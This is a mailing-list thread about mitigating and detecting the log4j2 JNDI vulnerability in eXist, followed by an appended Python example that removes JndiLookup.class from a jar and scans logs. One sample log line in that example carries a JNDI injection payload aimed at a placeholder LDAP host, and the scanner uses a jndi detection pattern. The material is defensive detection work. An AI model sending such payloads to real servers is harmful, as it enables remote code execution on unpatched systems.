From: Michael W. <wes...@ja...> - 2021-12-16 01:32:00
Thank you, Ash. Logs go back to the end of November with neither jndi nor jdni (ignoring case). :-) I guess there are too many possible attack payloads to specify any single thing to look for if one was compromised. The logs do provide some reassurance. Thank you again. Take care.

On Thu, 16 Dec 2021 at 0:04, Clark, Ash <as....@no...> wrote:

> Hi Michael,
>
> Here’s a blog post that explains how the exploit works and an example log
> message:
>
> https://www.lunasec.io/docs/blog/log4j-zero-day/#how-the-exploit-works
>
> I did a case insensitive search for `jdni` in my own logs (found nothing,
> thankfully). I’m positive there are other tells that an expert would be
> able to seek out.
>
> ~Ash
>
> ------------------------------
> *From:* Michael Westbay <wes...@ja...>
> *Sent:* Wednesday, December 15, 2021 3:16 AM
> *To:* Pietro Liuzzo <pie...@gm...>
> *Cc:* Clark, Ash <as....@no...>; exist-open <exi...@li...>
> *Subject:* Re: [Exist-open] log4j2 vulnerability
>
> Extracting from the JAR file worked for me with both
> the log4j-core-2.14.1.jar included with eXist 5.3.0 and with
> the log4j-core-2.15.0.jar that I downloaded.
>
> What I want to know is what are the signs of infection? I doubt if my
> systems are prime targets, but if someone was doing an automated spray to
> see what caught, what should I be looking for? I remember the PUT
> vulnerability a few years ago and found some attempts at PUTing PHP files
> on my server. They went into the eXist database at the /db root where they
> weren't effective. But their presence had me on edge.
>
> On Wed, 15 Dec 2021 at 16:17, Pietro Liuzzo <pie...@gm...> wrote:
>
> > Thanks!
> >
> > I have tried to do this as well but I am told that there is nothing to do.
> > perhaps the location of that class depends on the system?
> >
> > all best
> > Pietro
> >
> > Pietro Maria Liuzzo (egli/lui, he/him, er/ihn)
> > cel (DE): +49 (0) 176 61 000 606
> > Skype: pietro.liuzzo (Quingentole)
> > ORCID: https://orcid.org/0000-0001-5714-4011
> > Academia: https://uni-hamburg.academia.edu/PietroMariaLiuzzo
> >
> > On 14 Dec 2021, at 22:27, Clark, Ash <as....@no...> wrote:
> >
> > > zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
> > >
> > > _______________________________________________
> > > Exist-open mailing list
> > > Exi...@li...
> > > https://lists.sourceforge.net/lists/listinfo/exist-open
>
> --
> Michael Westbay
> Writer/System Administrator
> http://www.japanesebaseball.com/

--
Michael Westbay
Writer/System Administrator
http://www.japanesebaseball.com/
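An added example, not from this thread or the eXist project, that combines the two checks discussed above: confirming that the `zip -q -d` removal of JndiLookup.class Ash posted actually took effect on a log4j-core jar, and the case-insensitive search of log lines for `${jndi:` lookups. The jar and the access-log lines are constructed in-memory so it runs offline; `example.invalid` is a placeholder host.

```python
import io
import re
import zipfile

# Entry that Ash's `zip -q -d` command deletes from log4j-core-*.jar.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

# Lookup prefix, matched regardless of case (Ash's log search was case-insensitive).
JNDI_PATTERN = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def jar_has_jndi_lookup(jar_bytes: bytes) -> bool:
    """True if the jar still ships JndiLookup.class, i.e. the removal did not take."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        return JNDI_LOOKUP_CLASS in jar.namelist()


def remove_jndi_lookup(jar_bytes: bytes) -> bytes:
    """Rewrite the jar without JndiLookup.class (same effect as `zip -q -d`)."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as src, \
            zipfile.ZipFile(out, "w") as dst:
        for info in src.infolist():
            if info.filename != JNDI_LOOKUP_CLASS:
                dst.writestr(info, src.read(info.filename))
    return out.getvalue()


def find_jndi_lines(log_lines):
    """(line number, line) for every log line carrying a ${jndi:...} lookup."""
    return [(n, ln) for n, ln in enumerate(log_lines, 1) if JNDI_PATTERN.search(ln)]


def build_sample_jar() -> bytes:
    """Constructed stand-in for log4j-core-2.14.1.jar: a manifest plus the lookup class."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        jar.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # placeholder class bytes
    return buf.getvalue()


# Constructed access-log lines; only the second carries a lookup string (in the User-Agent).
SAMPLE_LOG = [
    '10.0.0.5 - - [15/Dec/2021:03:16:02 +0000] "GET /exist/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [15/Dec/2021:03:17:45 +0000] "GET / HTTP/1.1" 200 512 "-" "${JNDI:ldap://example.invalid/x}"',
]

if __name__ == "__main__":
    jar = build_sample_jar()
    print("JndiLookup present before removal:", jar_has_jndi_lookup(jar))
    print("JndiLookup present after removal: ", jar_has_jndi_lookup(remove_jndi_lookup(jar)))
    for n, ln in find_jndi_lines(SAMPLE_LOG):
        print(f"log line {n} has a JNDI lookup: {ln}")
```

Point `jar_has_jndi_lookup` at the bytes of a real log4j-core jar after running the `zip -d` command to confirm the class is gone, and feed `find_jndi_lines` the lines of an actual access or application log.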